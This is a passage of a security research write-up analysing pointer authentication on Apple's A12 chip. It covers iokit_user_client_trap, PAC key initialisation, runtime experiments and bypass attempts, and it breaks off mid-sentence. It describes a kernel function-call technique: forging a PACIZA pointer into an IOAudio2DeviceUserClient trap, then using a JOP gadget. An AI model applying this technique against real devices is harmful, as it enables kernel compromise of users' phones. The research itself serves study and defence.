The traditional way to get kernel code execution via read/write is the iokit_user_client_trap() strategy described by Stefan Esser in Tales from iOS 6 Exploitation. This strategy involves patching the vtable of an IOUserClient instance so that calling the userspace function IOConnectTrap6(), which invokes iokit_user_client_trap() in the kernel, will call an arbitrary function with up to 7 arguments. To see why this works, here's the implementation of iokit_user_client_trap() from XNU 4903.221.2:
kern_return_t iokit_user_client_trap(struct iokit_user_client_trap_args *args){    kern_return_t result = kIOReturnBadArgument;    IOUserClient *userClient;
   if ((userClient = OSDynamicCast(IOUserClient,            iokit_lookup_connect_ref_current_task((mach_port_name_t)                (uintptr_t)args->userClientRef)))) {        IOExternalTrap *trap;        IOService *target = NULL;
       trap = userClient->getTargetAndTrapForIndex(&target, args->index);
       if (trap && target) {            IOTrap func;
           func = trap->func;
           if (func) {                result = (target->*func)(args->p1, args->p2, args->p3,                                         args->p4, args->p5, args->p6);            }        }
       iokit_remove_connect_reference(userClient);    }
   return result;}
If we can patch the IOUserClient instance such that getTargetAndTrapForIndex() returns controlled values for trap and target, then the invocation of target->func below will call an arbitrary kernel function with up to 7 controlled arguments (target plus p1 through p6).
To see how this strategy would work on A12 devices, let's examine the changes to this function introduced by PAC. This is easiest to understand by looking at the disassembly:
iokit_user_client_trap    PACIBSP    ...        ;; Call iokit_lookup_connect_ref_current_task() on    ...        ;; args->userClientRef and cast the result to IOUserClient.
loc_FFFFFFF00808FF00    STR        XZR, [SP,#0x30+var_28]  ;; target = NULL    LDR        X8, [X19]               ;; x19 = userClient, x8 = ->vtable    AUTDZA     X8                      ;; validate vtable's PAC    ADD        X9, X8, #0x5C0          ;; x9 = pointer to vmethod in vtable    LDR        X8, [X8,#0x5C0]         ;; x8 = vmethod getTargetAndTrapForIndex    MOVK       X9, #0x2BCB,LSL#48      ;; x9 = 2BCB`vmethod_pointer    LDR        W2, [X20,#8]            ;; w2 = args->index    ADD        X1, SP, #0x30+var_28    ;; x1 = &target    MOV        X0, X19                 ;; x0 = userClient    BLRAA      X8, X9                  ;; PAC call ->getTargetAndTrapForIndex    LDR        X9, [SP,#0x30+var_28]   ;; x9 = target    CMP        X0, #0    CCMP       X9, #0, #4, NE    B.EQ       loc_FFFFFFF00808FF84    ;; if !trap || !target    LDP        X8, X11, [X0,#8]        ;; x8 = trap->func, x11 = func virtual?    AND        X10, X11, #1    ORR        X12, X10, X8    CBZ        X12, loc_FFFFFFF00808FF84       ;; if !func    ADD        X0, X9, X11,ASR#1       ;; x0 = target    CBNZ       X10, loc_FFFFFFF00808FF58    MOV        X9, #0                  ;; Use context 0 for non-virtual func    B          loc_FFFFFFF00808FF70
loc_FFFFFFF00808FF58    ...        ;; Handle the case where trap->func is a virtual method.
loc_FFFFFFF00808FF70    LDP        X1, X2, [X20,#0x10]     ;; x1 = args->p1, x2 = args->p2    LDP        X3, X4, [X20,#0x20]     ;; x3 = args->p3, x4 = args->p4    LDP        X5, X6, [X20,#0x30]     ;; x5 = args->p5, x6 = args->p6    BLRAA      X8, X9                  ;; PAC call func(target, p1, ..., p6)    MOV        X21, X0
loc_FFFFFFF00808FF84    ...        ;; Call iokit_remove_connect_reference().
loc_FFFFFFF00808FF8C    ...        ;; Epilogue.    RETAB
As you can see, there are several places where PACs are authenticated. The first, which was omitted from the assembly for brevity, happens when performing the dynamic cast to IOUserClient. Then userClient's vtable is validated and a PAC-protected call to getTargetAndTrapForIndex() is made. After that, the trap->func field is read without validation, and finally the value func is validated with context 0 and called.
This is actually about the best case we could reasonably hope for as attackers. If we can find a legitimate user client that provides an implementation of getTargetAndTrapForIndex() that returns a pointer to an IOExternalTrap residing in writable memory, then all we have to do is replace trap->func with a PACIZA'd function pointer (that is, a pointer signed under APIAKey with context 0). That means only a partial PAC bypass, such as the ability to forge just PACIZA pointers, would be sufficient.
A quick search through the kernelcache revealed a unique IOUserClient class, IOAudio2DeviceUserClient, that fit these criteria. Here's a decompilation of its getTargetAndTrapForIndex() method:
IOExternalTrap *IOAudio2DeviceUserClient::getTargetAndTrapForIndex(        IOAudio2DeviceUserClient *this, IOService **target, unsigned int index){    ...    *target = (IOService *)this;    return &this->IOAudio2DeviceUserClient.traps[index];}
The traps field is initialized in the method IOAudio2DeviceUserClient::initializeExternalTrapTable() to a heap-allocated IOExternalTrap object:
this->IOAudio2DeviceUserClient.trap_count = 1;this->IOAudio2DeviceUserClient.traps = IOMalloc(sizeof(IOExternalTrap));
Thus, all we need to do to call an arbitrary kernel function is create our own IOAudio2DeviceUserClient connection, forge a PACIZA pointer to the function we want to call, overwrite the userClient->traps[0].func field with the PACIZA'd pointer, and invoke IOConnectTrap6() from userspace. This will give us control of all arguments except X0, which is explicitly set to this by IOAudio2DeviceUserClient's implementation of getTargetAndTrapForIndex().
To gain control of X0 alongside X1 through X6, we'll need to replace IOAudio2DeviceUserClient's implementation of getTargetAndTrapForIndex() in the vtable. This means that, in addition to forging the PACIZA pointer to the function we want to call, we'll also need to create a fake vtable consisting of PACIA'd pointers to the virtual methods, and we'll need to replace the existing vtable pointer with a PACDZA'd pointer to the fake vtable. This requires a significantly broader PAC forgery capability.
However, even if we only manage to produce PACIZA forgeries, there's still a way to gain control of X0: JOP gadgets. A quick search through the kernelcache revealed the following gadget that sets X0:
MOV         X0, X4BR          X5
This gives us a way to call arbitrary kernel functions with 4 fully controlled arguments using just a single forged pointer: use iokit_user_client_trap() to call a PACIZA'd pointer to this gadget with X1 through X3 set how we want them for the function call, X4 set to our desired value for X0, and X5 set to the target function we want to call.Analyzing PAC on the A12Now that we know how we can use PAC forgery to call arbitrary kernel functions, let's begin analyzing Apple's implementation of PAC on the A12 SoC for weaknesses. Ideally we'll find a way to perform both PACIA and PACDA forgeries, but as previously discussed, even the ability to forge a single PACIZA pointer will be sufficient to call arbitrary kernel functions with up to 4 arguments.
To actually perform my analysis, I used the voucher_swap exploit to get kernel read/write on an iPhone XR running iOS 12.1.1 build 16C50.Finding where PAC keys are setMy first step was to identify where in the kernel's code the PAC keys were being set. Unfortunately, IDA does not display names for the special registers used to store the PAC keys, so I had to do a bit of digging.
Searching for "APIAKey" in the LLVM repository mirror on GitHub revealed that the registers used to store the APIAKey are called APIAKeyLo_EL1 and APIAKeyHi_EL1, and the registers for other keys are similarly named. Furthermore, the file AArch64SystemOperands.td declares the codes for these registers. This allows us to easily search for these registers in IDA. For example, to find where APIAKeyLo_EL1 is set, I searched for the string "#0, c2, c1, #0". This brought me to what I identified as part of common_start, from osfmk/arm64/start.s:
_WriteStatusReg(TCR_EL1, sysreg_restore);               // 3, 0, 2, 0, 2PPLTEXT__set__TTBR0_EL1(x25 & 0xFFFFFFFFFFFF);_WriteStatusReg(TTBR1_EL1, (x25 + 0x4000) & 0xFFFFFFFFFFFF);    // 3, 0, 2, 0, 1_WriteStatusReg(MAIR_EL1, 0x44F00BB44FF);               // 3, 0, 10, 2, 0if ( x21 )    _WriteStatusReg(TTBR1_EL1, cpu_ttep);               // 3, 0, 2, 0, 1_WriteStatusReg(VBAR_EL1, ExceptionVectorsBase + x22 - x23);    // 3, 0, 12, 0, 0do    x0 = _ReadStatusReg(S3_4_C15_C0_4);                 // ????while ( !(x0 & 2) );_WriteStatusReg(S3_4_C15_C0_4, x0 | 5);                 // ????__isb(0xF);_WriteStatusReg(APIBKeyLo_EL1, 0xFEEDFACEFEEDFACF);     // 3, 0, 2, 1, 2_WriteStatusReg(APIBKeyHi_EL1, 0xFEEDFACEFEEDFACF);     // 3, 0, 2, 1, 3_WriteStatusReg(APDBKeyLo_EL1, 0xFEEDFACEFEEDFAD0);     // 3, 0, 2, 2, 2_WriteStatusReg(APDBKeyHi_EL1, 0xFEEDFACEFEEDFAD0);     // 3, 0, 2, 2, 3_WriteStatusReg(S3_4_C15_C1_0, 0xFEEDFACEFEEDFAD1);     // ????_WriteStatusReg(S3_4_C15_C1_1, 0xFEEDFACEFEEDFAD1);     // ????_WriteStatusReg(APIAKeyLo_EL1, 0xFEEDFACEFEEDFAD2);     // 3, 0, 2, 1, 0_WriteStatusReg(APIAKeyHi_EL1, 0xFEEDFACEFEEDFAD2);     // 3, 0, 2, 1, 1_WriteStatusReg(APDAKeyLo_EL1, 0xFEEDFACEFEEDFAD3);     // 3, 0, 2, 2, 0_WriteStatusReg(APDAKeyHi_EL1, 0xFEEDFACEFEEDFAD3);     // 3, 0, 2, 2, 1_WriteStatusReg(APGAKeyLo_EL1, 0xFEEDFACEFEEDFAD4);     // 3, 0, 2, 3, 0_WriteStatusReg(APGAKeyHi_EL1, 0xFEEDFACEFEEDFAD4);     // 3, 0, 2, 3, 1_WriteStatusReg(SCTLR_EL1, 0xFC54793D);                 // 3, 0, 1, 0, 0__isb(0xF);_WriteStatusReg(CPACR_EL1, 0x300000);                   // 3, 0, 1, 0, 2_WriteStatusReg(TPIDR_EL1, 0);                          // 3, 0, 13, 0, 4
This is very interesting, since it looks like common_start sets the PAC keys to constant values every time a core starts up! Thinking that perhaps this was an artifact of the decompilation, I checked the disassembly:
common_start+A8    LDR        X0, =0xFEEDFACEFEEDFACF ;; x0 = pac_key    MSR        #0, c2, c1, #2, X0      ;; APIBKeyLo_EL1    MSR        #0, c2, c1, #3, X0      ;; APIBKeyHi_EL1    ADD        X0, X0, #1    MSR        #0, c2, c2, #2, X0      ;; APDBKeyLo_EL1    MSR        #0, c2, c2, #3, X0      ;; APDBKeyHi_EL1    ADD        X0, X0, #1    MSR        #4, c15, c1, #0, X0     ;; ????    MSR        #4, c15, c1, #1, X0     ;; ????    ADD        X0, X0, #1    MSR        #0, c2, c1, #0, X0      ;; APIAKeyLo_EL1    MSR        #0, c2, c1, #1, X0      ;; APIAKeyHi_EL1    ADD        X0, X0, #1    MSR        #0, c2, c2, #0, X0      ;; APDAKeyLo_EL1    MSR        #0, c2, c2, #1, X0      ;; APDAKeyHi_EL1...pac_key    DCQ 0xFEEDFACEFEEDFACF      ; DATA XREF: common_start+A8↑r
No, common_start really was initializing all the PAC keys to constant values. This was quite surprising: clearly Apple knows that using constant PAC keys breaks all of PAC's security guarantees. So I figured there must be some other place the PAC keys were being initialized to their true runtime values.
But after much searching, this appeared to be the only location in the kernelcache that was setting the A keys and the general key. Still, it did appear that the B keys were being set in a few more places:
machine_load_context+A8    LDR        X1, [X0,#0x458]    ...    MSR        #0, c2, c1, #2, X1      ;; APIBKeyLo_EL1    MSR        #0, c2, c1, #3, X1      ;; APIBKeyHi_EL1    ADD        X1, X1, #1    MSR        #0, c2, c2, #2, X1      ;; APDBKeyLo_EL1    MSR        #0, c2, c2, #3, X1      ;; APDBKeyHi_EL1
Call_continuation+10    LDR        X5, [X4,#0x458]    ...    MSR        #0, c2, c1, #2, X5      ;; APIBKeyLo_EL1    MSR        #0, c2, c1, #3, X5      ;; APIBKeyHi_EL1    ADD        X5, X5, #1    MSR        #0, c2, c2, #2, X5      ;; APDBKeyLo_EL1    MSR        #0, c2, c2, #3, X5      ;; APDBKeyHi_EL1
Switch_context+11C    LDR        X3, [X2,#0x458]    ...    MSR        #0, c2, c1, #2, X3      ;; APIBKeyLo_EL1    MSR        #0, c2, c1, #3, X3      ;; APIBKeyHi_EL1    ADD        X3, X3, #1    MSR        #0, c2, c2, #2, X3      ;; APDBKeyLo_EL1    MSR        #0, c2, c2, #3, X3      ;; APDBKeyLo_EL1
Idle_load_context+88    LDR        X1, [X0,#0x458]    ...    MSR        #0, c2, c1, #2, X1      ;; APIBKeyLo_EL1    MSR        #0, c2, c1, #3, X1      ;; APIBKeyHi_EL1    ADD        X1, X1, #1    MSR        #0, c2, c2, #2, X1      ;; APDBKeyLo_EL1    MSR        #0, c2, c2, #3, X1      ;; APDBKeyHi_EL1
These are the only other places in the kernel that set PAC keys, and they all follow the same pattern: a 64-bit load from offset 0x458 into some data structure (later identified as struct thread), then setting the APIBKey to that value concatenated with itself, and setting the APDBKey to that value plus one concatenated with itself.
Furthermore, all of these locations deal specifically with context switching between threads; conspicuously absent from this list is any indication that the PAC keys are changed when transitioning between exception levels, either on kernel entry (e.g. via a syscall) or on kernel exit (via ERET*). This would be a strong indication that the PAC keys are indeed shared between userspace and the kernel.
(I subsequently learned that @ProteasWang discovered the same thing I did: a GitHub gist called pac-set-key.md lists only the previously mentioned locations.)
If my understanding was correct, this seemed to suggest three disturbing and, frankly, highly unlikely things. First, contrary to all rules of cryptography, it appeared that the kernel was using constant values for the A keys and the general key. Second, the keys seemed to be effectively 64-bits, since the first and second halves of the 128-bit key are the same. And third, the PAC keys appeared to be shared between userspace and the kernel, meaning userspace could forge kernel PAC signatures. Could Apple's implementation really be that broken? Or was something else going on?Observing runtime behaviorIn order to find out, I conducted a simple experiment: I read the value of a global PACIZA'd function pointer in the __DATA_CONST.__const section over many different boots, recording the value of the kASLR slide each time. Since the number of possible kernel slide values is relatively small, it shouldn't be too long before I get two separate boots with the kernel at the exact same location in memory, meaning that the original, non-PAC'd value of the pointer would be the same both times. Then, if the A keys really are constant, the value of the PACIZA'd pointer should be the same in both boots, since the signing algorithm is deterministic and the pointer and context values being signed are the same both times.
As a target, I chose to read sysclk_ops.c_gettime, which is a pointer to the function rtclock_gettime(). The results of this experiment over 30 trials are listed below, with colliding runs highlighted:
slide = 000000000ce00000, c_gettime = b2902c70147f2050slide = 0000000023200000, c_gettime = 61e2c2f02abf2050slide = 0000000023000000, c_gettime = d98e57f02a9f2050slide = 0000000006e00000, c_gettime = 0b9613700e7f2050slide = 000000001ce00000, c_gettime = c3822bf0247f2050slide = 0000000004600000, c_gettime = 00d248f00bff2050slide = 000000001fe00000, c_gettime = 6aa61ef0277f2050slide = 0000000013400000, c_gettime = fda847701adf2050slide = 0000000015a00000, c_gettime = c5883b701d3f2050slide = 000000000a200000, c_gettime = bbe37ef011bf2050slide = 0000000014200000, c_gettime = a8ff9f701bbf2050slide = 0000000014800000, c_gettime = 20e538701c1f2050slide = 0000000019800000, c_gettime = 66f61b70211f2050slide = 000000001c200000, c_gettime = 24aea37023bf2050slide = 0000000006c00000, c_gettime = 5a9b42f00e5f2050slide = 000000000e200000, c_gettime = 128526f015bf2050slide = 000000001fa00000, c_gettime = 4cf2ad70273f2050slide = 000000000a200000, c_gettime = 6ed3177011bf2050slide = 000000000ea00000, c_gettime = 869d0f70163f2050slide = 0000000015800000, c_gettime = 9898c2f01d1f2050slide = 000000001d400000, c_gettime = 52a343f024df2050slide = 000000001d600000, c_gettime = 7ea2337024ff2050slide = 0000000023e00000, c_gettime = 31d3b3f02b7f2050slide = 0000000008e00000, c_gettime = 27a72cf0107f2050slide = 000000000fa00000, c_gettime = 2b988f70173f2050slide = 0000000011000000, c_gettime = 86c7a670189f2050slide = 0000000011a00000, c_gettime = 3d8103f0193f2050slide = 000000001c200000, c_gettime = 56d444f023bf2050slide = 000000001fe00000, c_gettime = 82fa3970277f2050slide = 0000000008c00000, c_gettime = 89dcda70105f2050
As you can see, even though by all accounts the IA key is the same, PACIZAs for the same pointer generated across different boots are somehow different.
The most straightforward solution I could think of was that iBoot or the kernel might be overwriting pac_key with a random value each boot before common_start runs, so that the PAC keys really are different each boot. Even though pac_key resides in __TEXT_EXEC.__text, which is protected against writes by KTRR, it's still possible to modify __TEXT_EXEC.__text before KTRR lockdown is performed. However, reading pac_key at runtime showed it still contained the value 0xfeedfacefeedfacf, so something else must be going on.
I next performed an experiment to determine whether the PAC keys really were shared between userspace and the kernel, as the code suggested. I executed the PACIZA instruction in userspace on the address of the rtclock_gettime() function, and then compared against the PACIZA'd sysclk_ops.c_gettime pointer read from kernel memory. These two values differed despite the fact that the PAC keys should be the same in userspace and the kernel, so once again it appeared that the A12 was conjuring some sort of dark magic.
Still not quite believing that pac_key wasn't being modified at runtime, I tried enumerating the B-key values of all threads on the system to see whether they really matched the 0xfeedfacefeedfacf value suggested by the code. Looking at the code for Switch_context in osfmk/arm64/cswitch.s, I determined that the value used as a seed to compute the B keys was being loaded from offset 0x458 of struct thread, the Mach struct representing a thread. This field is not present in the public XNU sources, so I decided to name it pac_key_seed. My experiment consisted of walking the global thread list and dumping each thread's pac_key_seed.
I found that all kernel threads were indeed using the 0xfeedfacefeedfacf PAC key seed, while threads for userspace processes were using different, random seeds:
pid   0  thread ffffffe00092c000  pac_seed feedfacefeedfacfpid   0  thread ffffffe00092c550  pac_seed feedfacefeedfacfpid   0  thread ffffffe00092caa0  pac_seed feedfacefeedfacf...pid 258  thread ffffffe003597520  pac_seed 51c6b449d9c6e7a3pid 258  thread ffffffe003764aa0  pac_seed 51c6b449d9c6e7a3
Thus, it did seem like the PAC keys for kernel threads were being initialized the same each boot, and yet the PAC'd pointers were different across boots. Something fishy was going on.Bypass attemptsI next turned my attention to bypassing PAC using the weaknesses identified in the section "Weaknesses against kernel attackers".
Since executing the same PACIZA instruction on the same pointer value with the same PAC keys across different boots was producing different results, there must be some unidentified source of per-boot randomness. This basically spelled doom for the "implement QARMA-64 in userspace and compute PACs manually" strategy, but I decided to try it anyway. Unsurprisingly, this did not work.
Next I looked at whether I could set my own thread's PAC keys equal to the kernel PAC keys and forge kernel pointers in userspace. Ideally this would mean I'd set my IA key equal to the kernel's IA key, namely 0xfeedfacefeedfad2. However, as previously discussed, there's only one place in the kernel that appears to set the A keys, common_start, and yet userspace and kernel PAC codes are different anyway.
So I decided to combine this approach with the PAC cross-key symmetry weakness and instead set my thread's IB key equal to the kernel's IA key, which should allow me to forge kernel PACIZA pointers by executing PACIZB in userspace.
Unfortunately, the naive way of doing this, by overwriting the pac_key_seed field in the current thread, would probably crash or panic the system, since changing PAC keys during a thread's lifetime will break the thread's existing PAC signatures. And PAC signatures are checked all the time, most frequently when returning from a function via RETAB. This means that the only way to guarantee that changing a thread's PAC keys doesn't crash it or trigger a panic is to ensure that the thread does not call or return from any functions while the keys have been changed.
The easiest way to do this is to spawn a thread that infinite loops in userspace executing PACIZB and storing the result to a global variable. Then we can overwrite the thread's pac_key_seed and force the thread off-core using contention; once the looping thread is rescheduled, its B keys will be set via Switch_context and the forgery will be executed.
However, once again, the result of this experiment was unsuccessful:
gettime       = fffffff0161f2050kPACIZA       = faef2270161f2050uPACIZA       = 138a8670161f2050uPACIZB forge = d7fd0ff0161f2050
It seemed that the A12 manages to break either cross-EL PAC symmetry or cross-key PAC symmetry.
To gain a bit more insight, I devised a test specifically for cross-key PAC symmetry. This meant setting my thread's IB key equal to the DB key and checking whether the outputs of PACIZB and PACDZB looked similar, indicating that the same PAC was generated. Since the IB and DB keys are generated from the same seed and cannot be set independently, this actually involved 2 trials: first with seed value 0x11223344, and next with seed value 0x11223345:
IB = 0x11223344  uPACIZB = 0028180100000000DB = 0x11223345  uPACDZB = 00679e0100000000IB = 0x11223345  uPACIZB = 003ea80100000000DB = 0x11223346  uPACDZB = 0023c58100000000
The highlighted rows show the result of executing PACDZB and PACIZB on the same value from userspace with the same keys. On a standard ARMv8.3 implementation of Pointer Authentication, we'd expect most of the bits of the PAC to agree. However, the two PACs seem unrelated, suggesting that the A12 does indeed manage to break cross-key PAC symmetry.Implementation theoriesWith all three weaknesses suggested by the original design demonstrably not applicable to the A12, it was time to try and work out what was really going on here.
It's clear that Apple had considered the fact that Pointer Authentication as defined in the standard would do little to protect against kernel attackers with read/write, and thus they decided to implement a more robust defense. It's impossible to know what exactly they did without a concerted reverse engineering effort, but we can speculate based on the observed behavior.
My first thought was that Apple had decided to implement a secure monitor again, like it had done on prior devices with Watchtower to protect against kernel patches. If the secure monitor could trap transitions between exception levels and trap writes to the PAC key registers, it could hide the true PAC keys from the kernel and implement other shenanigans to break PAC symmetries. However, I couldn't find evidence of a secure monitor inside the kernelcache.
Another alternative is that Apple has decided to move the true PAC keys into the A12 itself, so that even the most powerful software attacker doesn't have the ability to read the keys. The keys could be generated randomly on boot or set via special registers by iBoot. Then, the keys that are fed to QARMA-64 (or whatever algorithm is actually being used to generate PACs) would be some combination of the random key, the standard key set via special registers, and the current exception level.
For example, the A12 could theoretically store 10 random 128-bit PAC keys, one for each pair of an exception level (EL0 or EL1) and a standard PAC key (IA, IB, DA, DB, or GA). Then the PAC key used for any particular operation could be the XOR of the random PAC key corresponding to the operation (e.g. IB-EL0 for a PACIB instruction in userspace) with the standard PAC key set via the standard registers (e.g. APIBKey). Such a design wouldn't come without challenges (for example, you'd need a non-volatile place to store the random keys for when the core sleeps), but it would cleanly break the cross-EL and cross-key symmetries and prevent the keys from ever being disclosed, completely mitigating the three previously identified weaknesses.
While I couldn't figure out the true implementation, I decided to assume the most robust design for the rest of my research: that the true keys are random and stored in the SoC itself. That way, any bypass strategy I found would be all but guaranteed to work regardless of the actual implementation.PAC EL-impersonationWith zero leads for systematic weaknesses, I decided it was time to investigate PAC signing gadgets.
The very first PACIA instruction occurs in a function I identified as vm_shared_region_slide_page(), and specifically as an inlined copy of vm_shared_region_slide_page_v3(). This function is present in the XNU sources, and has the following interesting comment in its main loop:
uint8_t* rebaseLocation = page_content;uint64_t delta = page_entry;do {    rebaseLocation += delta;    uint64_t value;    memcpy(&value, rebaseLocation, sizeof(value));    delta = ( (value & 0x3FF8000000000000) >> 51) * sizeof(uint64_t);
   // A pointer is one of :    // {    //     uint64_t pointerValue : 51;    //     uint64_t offsetToNextPointer : 11;    //     uint64_t isBind : 1 = 0;    //     uint64_t authenticated : 1 = 0;    // }    // {    //     uint32_t offsetFromSharedCacheBase;    //     uint16_t diversityData;    //     uint16_t hasAddressDiversity : 1;    //     uint16_t hasDKey : 1;    //     uint16_t hasBKey : 1;    //     uint16_t offsetToNextPointer : 11;    //     uint16_t isBind : 1;    //     uint16_t authenticated : 1 = 1;    // }
   bool isBind = (value & (1ULL << 62)) == 1;    if (isBind) {        return KERN_FAILURE;    }
   bool isAuthenticated = (value & (1ULL << 63)) != 0;
   if (isAuthenticated) {        // The new value for a rebase is the low 32-bits of the threaded value        // plus the slide.        value = (value & 0xFFFFFFFF) + slide_amount;        // Add in the offset from the mach_header        const uint64_t value_add = s_info->value_add;        value += value_add;
   } else {        // The new value for a rebase is the low 51-bits of the threaded value        // plus the slide. Regular pointer which needs to fit in 51-bits of        // value. C++ RTTI uses the top bit, so we'll allow the whole top-byte        // and the bottom 43-bits to be fit in to 51-bits.        ...    }
   memcpy(rebaseLocation, &value, sizeof(value));} while (delta != 0);
The part about the "pointer" containing authenticated, hasBKey, and hasDKey bits suggests that this code is dealing with authenticated pointers, although all the code that actually performs PAC operations has been removed from the public sources. Furthermore, the other comment about C++ RTTI suggests that this code is specifically for rebasing userspace code. This means that the kernel would have to be aware of, and maybe perform PAC operations on, userspace pointers.
Looking at the decompilation of this loop in IDA, we can see that there are many operations not present in the public source code:
slide_amount = si->slide;offset = uservaddr - rebaseLocation;do{    rebaseLocation += delta;    value = *(uint64_t *)rebaseLocation;    delta = (value >> 48) & 0x3FF8;    if ( value & 0x8000000000000000 )       // isAuthenticated    {        value = slide_amount + (uint32_t)value + slide_info_entry->value_add;        context = (value >> 32) & 0xFFFF;   // diversityData        if ( value & 0x1000000000000 )      // hasAddressDiversity            context = (offset + rebaseLocation) & 0xFFFFFFFFFFFF                    | (context << 48);        if ( si->UNKNOWN_FIELD && !(BootArgs->bootFlags & 0x4000000000000000) )        {            daif = _ReadStatusReg(ARM64_SYSREG(3, 3, 4, 2, 1));// DAIF            if ( !(daif & 0x80) )                __asm { MSR             #6, #3 }            _WriteStatusReg(S3_4_C15_C0_4,                _ReadStatusReg(S3_4_C15_C0_4) & 0xFFFFFFFFFFFFFFFB);            __isb(0xFu);            key_bits = (value >> 49) & 3;            switch ( key_bits )            {                case 0:                    value = ptrauth_sign...(value, ptrauth_key_asia, &context);                    break;                case 1:                    value = ptrauth_sign...(value, ptrauth_key_asib, &context);                    break;                case 2:                    value = ptrauth_sign...(value, ptrauth_key_asda, &context);                    break;                case 3:                    value = ptrauth_sign...(value, ptrauth_key_asdb, &context);                    break;            }            _WriteStatusReg(S3_4_C15_C0_4, _ReadStatusReg(S3_4_C15_C0_4) | 4);            __isb(0xFu);            ml_set_interrupts_enabled(~(daif >> 7) & 1);        }    }    else    {        ...    }    memmove(rebaseLocation, &value, 8);}while ( delta );
It appears that the kernel is attempting to sign pointers on behalf of userspace. This is interesting because, as previously discussed, the A12 breaks cross-EL symmetry, which should mean that the kernel's signatures on userspace pointers will be invalid in userspace.
It's unlikely that this freshly-introduced code is broken, so there must be some mechanism by which the kernel instructs the CPU to sign with userspace pointers instead. Searching for other instances of PAC* instructions like this, a pattern begins to emerge: whenever the kernel signs pointers on behalf of userspace, it wraps the PAC instructions by clearing and setting a bit in the S3_4_C15_C0_4 system register:
MRS         X8, #4, c15, c0, #4 ; S3_4_C15_C0_4AND         X8, X8, #0xFFFFFFFFFFFFFFFBMSR         #4, c15, c0, #4, X8 ; S3_4_C15_C0_4ISB
...         ;; PAC stuff for userspace
MRS         X8, #4, c15, c0, #4 ; S3_4_C15_C0_4ORR         X8, X8, #4MSR         #4, c15, c0, #4, X8 ; S3_4_C15_C0_4ISB
Also, kernel code that sets/clears bit 0x4 of S3_4_C15_C0_4 is usually accompanied by code that disables interrupts and checks bit 0x4000000000000000 of BootArgs->bootFlags, as we see in the excerpt from vm_shared_region_slide_page_v3() above.
We can infer that bit 0x4 of S3_4_C15_C0_4 controls whether PAC* instructions in the kernel use the EL0 keys or the EL1 keys: when this bit is set the kernel keys are used, otherwise the userspace keys are used. It makes sense that you'd need to disable interrupts while this bit is cleared, since otherwise the arrival of an interrupt may cause other kernel code to execute while the EL0 PAC keys are still in use, causing PAC validation failures that would panic the kernel.PAC-enable bits in SCTLR_EL1Another thing I noticed while investigating system registers was that previously reserved bits of SCTLR_EL1 were now being used to enable/disable PAC instructions for certain keys.
While looking at the exception vector for syscall entry, Lel0_synchronous_vector_64, I noticed some additional code referencing bootFlags and setting certain bits of SCTLR_EL1 that are marked as reserved in the ARM standard:
ADRP        X0, #const_boot_args@PAGEADD         X0, X0, #const_boot_args@PAGEOFFLDR         X0, [X0,#(const_boot_args.bootFlags - 0xFFFFFFF0077A21B8)]AND         X0, X0, #0x8000000000000000CBNZ        X0, loc_FFFFFFF0079B3320MRS         X0, #0, c1, c0, #0                  ;; SCTLR_EL1TBNZ        W0, #0x1F, loc_FFFFFFF0079B3320ORR         X0, X0, #0x80000000                 ;; set bit 31ORR         X0, X0, #0x8000000                  ;; set bit 27ORR         X0, X0, #0x2000                     ;; set bit 13MSR         #0, c1, c0, #0, X0                  ;; SCTLR_EL1
Also, these bits are conditionally cleared on exception return:
TBNZ        W1, #2, loc_FFFFFFF0079B3AE8        ;; SPSR_EL1.M[3:0] & 0x4...LDR         X2, [X2,#thread.field_460]CBZ         X2, loc_FFFFFFF0079B3AE8...MRS         X0, #0, c1, c0, #0                  ;; SCTLR_EL1AND         X0, X0, #0xFFFFFFFF7FFFFFFF         ;; clear bit 31AND         X0, X0, #0xFFFFFFFFF7FFFFFF         ;; clear bit 27AND         X0, X0, #0xFFFFFFFFFFFFDFFF         ;; clear bit 13MSR         #0, c1, c0, #0, X0                  ;; SCTLR_EL1
While these bits are documented as reserved (with value 0) by ARM, I did find a reference to one of them in the XNU 4903.221.2 sources, in osfmk/arm64/proc_reg.h:
// 13           PACDB_ENABLED            AddPACDB and AuthDB functions enabled#define SCTLR_PACDB_ENABLED             (1 << 13)
This suggested that bit 13 at least is related to enabling PAC for the DB key. Since the only SCTLR_EL1 bits that are both (a) not mentioned in the file and (b) not set automatically via SCTLR_RESERVED are 31, 30, and 27, I speculated that these bits controlled the other PAC keys. (Presumably, leaving the reference to SCTLR_PACDB_ENABLED in the code was an oversight.) My guess is that bit 31 controls PACIA, bit 30 controls PACIB, bit 27 controls PACDA, and bit 13 controls PACDB.
To test this theory, I executed the following sequence of PAC instructions in the debugger, both before and after setting the field at offset 0x460 of the current thread:
pacia  x0, x1pacib  x2, x3pacda  x4, x5pacdb  x6, x7
Before executing these instructions, I set each register Xn to the value 0x11223300 | n. Here's the result before setting field_460, with the PACs highlighted:
x0 = 0x001d498011223300    # PACIAx1 = 0x0000000011223301x2 = 0x0035778011223302    # PACIBx3 = 0x0000000011223303x4 = 0x0062860011223304    # PACDAx5 = 0x0000000011223305x6 = 0x001e6c8011223306    # PACDBx7 = 0x0000000011223307
And here's the result after:
x0 = 0x0000000011223300    # PACIAx1 = 0x0000000011223301x2 = 0x0035778011223302    # PACIBx3 = 0x0000000011223303x4 = 0x0000000011223304    # PACDAx5 = 0x0000000011223305x6 = 0x0000000011223306    # PACDBx7 = 0x0000000011223307
This seems to confirm our theory: before setting field_460, the PAC instructions worked as expected, but after setting field_460, all except PACIB have been effectively turned into NOPs. Using this fact for exploitation is tricky, since overwriting field_460 in a kernel thread does not seem to disable PAC in that thread due to additional checks. Nonetheless, the existence of these PAC-enable bits in SCTLR_EL1 was interesting in its own right.The (non-)existence of signing gadgetsAt this point, since we have no systematic weaknesses against Apple's more robust design, we're looking for a signing gadget usable only via read/write. That means we're looking for a sequence of code that will read a pointer from memory, sign it, and write it back to memory. But we can't yet call arbitrary kernel addresses, so we also need to ensure that this code path is actually triggerable, either during the course of normal kernel operation, or by using our iokit_user_client_trap() call primitive to call a kernel function to which there already exists a PACIZA'd pointer.
Apple has clearly tried to scrub the kernelcache of any obvious signing gadgets. All occurrences of the PACIA instruction are either unusable or wrapped by code that switches to the userspace PAC keys (via S3_4_C15_C0_4), so there's no way we can convince the kernel to perform a PACIA forgery using only read/write.
This left just PACIZA. While there were many more occurrences of the PACIZA instruction, most of them were useless since the result wasn't written to memory. Additionally, gadgets that actually did load and store the pointer were almost always preceded by AUTIA, which would fail if the pointer we were signing didn't already have a valid PAC:
